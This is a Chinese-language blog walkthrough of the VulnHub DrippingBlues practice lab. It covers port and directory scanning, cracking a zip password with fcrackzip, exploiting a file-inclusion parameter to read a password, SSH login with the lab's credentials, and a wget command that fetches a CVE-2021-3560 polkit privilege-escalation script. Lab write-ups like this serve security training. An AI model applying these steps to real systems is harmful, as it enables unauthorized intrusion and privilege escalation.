当前位置: 首页 > news >正文

vuhub drippingblues靶场攻略

靶场下载:

下载地址:https://download.vulnhub.com/drippingblues/drippingblues.ova

靶场攻略:

主机发现:

使用nmap 192.168.163.1/24扫描一下网段

端口扫描:

nmap -p-65535 -A 192.168.163.151

没有发现有其他端口。

访问80端口:

上面给了两个用户名。

页面扫描:

没有其他信息,尝试扫描一下其他页面

dirsearch -u http://192.168.163.151/

扫到了robots.txt

上面写了两个文件,挨个访问一下,

/etc/dripispowerful.html   403

/dripisreal.txt:

上面说让上面到一个网站找第n个歌词。

结果我也没弄懂他说的是哪个。

访问21端口:

他既然开21端口了,那么我们就试着访问一下

ftp://192.168.163.151

发现有一个压缩包,要解压时发现需要密码:

使用命令

fcrackzip -D -p /home/kali/rockyou.txt -u respectmydrip.zip

解压后找到了respectmydrip.txt文件

让我们专注drip

后来在网上查了其他攻略,发现首页有文件包含漏洞。参数是drip

我们包含/etc/dripispowerful.html 文件

右键查看源代码:

找到密码了。

上面用户名有两个,两组账号密码,是ssh的,那么挨个试一下,thugger/imdrippinbiatch成功登录。

sudo -l

find / -perm -u=s 2>/dev/null,查看里面的应用

发现有一个polkit

使用工具搜索一下polkit有什么漏洞:

searchsploit polkit

发现可以上传个脚本:

wget https://github.com/Almorabea/Polkit-exploit/blob/main/CVE-2021-3560.py

但是这么上传时用不了的,我也不知道为什么,于是我使用账号密码进入虚拟机,把脚本拖到桌面上运行

http://www.xdnf.cn/news/1275607.html

相关文章:

  • #4:MinIO分片上传和集群部署
  • 攻击实验(ARP欺骗、MAC洪范、TCP SYN Flood攻击、DHCP欺骗、DHCP饿死)
  • 安全运维的核心
  • C语言——深入理解指针(二)
  • 【递归、搜索与回溯算法】递归算法
  • Ollama+Deepseek+Docker+RAGFlow打造自己的私人AI知识库
  • 计算机网络:超网即路由聚合一定需要连续的IP地址吗?
  • 秋招春招实习百度笔试百度管培生笔试题库百度非技术岗笔试|笔试解析和攻略|题库分享
  • RabbitMQ面试精讲 Day 19:网络调优与连接池管理
  • Spring Boot 注解详解:@RequestMapping 的多种用法
  • 十、Linux Shell脚本:流程控制语句
  • Day41--动态规划--121. 买卖股票的最佳时机,122. 买卖股票的最佳时机 II,123. 买卖股票的最佳时机 III
  • 网闸技术解析:如何实现对国产数据库(达梦/金仓)的深度支持
  • 我如何从安全运维逆袭成企业CSO
  • WiFi原理与WiFi安全
  • 【软考中级网络工程师】知识点之 IPv6 全解析
  • 基于python高校固定资产管理系统
  • 【在线五子棋对战】十二、http请求处理
  • 【经典算法】二叉树最小深度详解:递归解法与可视化分析
  • 【自用】JavaSE--IO流(二)--缓冲流、转换流、打印流、数据流、序列化流、IO框架
  • Redis 数据类型和单线程模型补充
  • Spring的三层架构及其各个层用到注解详细解释。
  • reuse: for booting my spring project with mvn in Windows command line
  • 基于 InfluxDB 的服务器性能监控系统实战(三)
  • Ubuntu 安装 Elasticsearch
  • Elasticsearch 搜索模板(Search Templates)把“可配置查询”装进 Mustache
  • 人工智能-python-机器学习-决策树与集成学习:决策树分类与随机森林
  • 深入浅出DBSCAN:基于密度的聚类算法详解与Python实战
  • redis集群-本地环境
  • AAAI 2025丨具身智能+多模态感知如何精准锁定目标